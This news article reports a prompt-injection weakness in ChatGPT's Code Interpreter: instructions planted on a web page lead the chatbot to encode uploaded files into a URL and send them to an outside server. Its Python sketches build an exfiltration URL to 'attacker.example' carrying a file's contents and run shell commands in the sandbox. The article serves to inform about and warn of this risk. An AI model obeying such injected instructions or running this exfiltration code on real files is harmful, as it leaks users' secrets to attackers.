OpenAI’s latest updates introduce a huge new security risk

WHY THIS MATTERS IN BRIEF

By being able to call and interact with third-party systems, AIs, apps, scripts, websites, and more, hackers have found a new way to hack “everything.”

 


OpenAI’s recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks.

 


 

The vulnerability has been known in ChatGPT for some time. The attack involves tricking ChatGPT into executing instructions fetched from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send that data to a malicious website. Pulling off such an attack requires specific conditions, for example, the user must actively paste a malicious URL into ChatGPT, but the risk remains concerning. The threat could be realized in various scenarios, including a trusted website being compromised with a malicious prompt, or through social engineering tactics.
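To make that encode-and-send step concrete, here is a minimal sketch in Python, the language Code Interpreter runs. The file name and the attacker domain are invented placeholders, and real injected instructions would arrive as prose on the malicious page rather than as ready-made code:

    # Minimal sketch of the exfiltration step described above: the kind
    # of code injected instructions might coax the sandbox into running.
    # The file path and attacker domain are hypothetical placeholders.
    import base64
    from urllib.parse import quote

    # Stand-in for a file the user previously uploaded to ChatGPT.
    with open("uploaded_secrets.txt", "w") as f:
        f.write("API_KEY=sk-test-0000")

    def encode_for_url(path: str) -> str:
        """Pack a file's contents into a URL-friendly string."""
        with open(path, "rb") as f:
            return quote(base64.urlsafe_b64encode(f.read()).decode())

    # The encoded data rides out as a query parameter: a single GET
    # request to the attacker's server leaks the file's contents.
    exfil_url = "https://attacker.example/collect?data=" + encode_for_url("uploaded_secrets.txt")
    print(exfil_url)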

 


 

Tom’s Hardware did some impressive work testing just how vulnerable users may be to this attack. The publication tested the exploit by creating a fake environment variables file and asking ChatGPT to process it, whereupon the chatbot inadvertently sent the data to an external server.
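For a sense of the test setup, a decoy environment variables file along those lines might look like the following sketch; every key and value here is invented, not taken from the Tom’s Hardware article:

    # Hypothetical reconstruction of a decoy "environment variables"
    # file like the one used in the test; all keys and values invented.
    fake_env = (
        "API_KEY=sk-test-000000000000\n"
        "DB_PASSWORD=not-a-real-password\n"
        "AWS_SECRET_ACCESS_KEY=AAAAAAAAAAAAAAAAAAAA\n"
    )

    # Writing it to disk stands in for the user uploading the file
    # to ChatGPT for analysis.
    with open("env_vars.txt", "w") as f:
        f.write(fake_env)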

 


 

Although the exploit’s effectiveness varied across sessions (e.g., ChatGPT sometimes refused to load external pages or transmit file data), it raises significant security concerns, especially given the AI’s ability to read and execute Linux commands and handle user-uploaded files in a Linux-based virtual environment.
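As a rough illustration of why that matters, Python running in such a sandbox can shell out to the underlying Linux system. The /mnt/data upload directory shown here is the commonly reported location; treat the exact path as an assumption:

    # Illustrative only: the kind of system access Python code has
    # inside a Linux sandbox. /mnt/data is the commonly reported
    # upload directory; the exact path is an assumption.
    import subprocess

    # Enumerate any user-uploaded files.
    print(subprocess.run(["ls", "-la", "/mnt/data"],
                         capture_output=True, text=True).stdout)

    # Run an arbitrary Linux command, as injected instructions could.
    print(subprocess.run(["uname", "-a"],
                         capture_output=True, text=True).stdout)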

 

As Tom’s Hardware concludes, even if an attack seems unlikely, the existence of this security loophole is significant: ChatGPT should ideally not execute instructions from external web pages, yet it does.
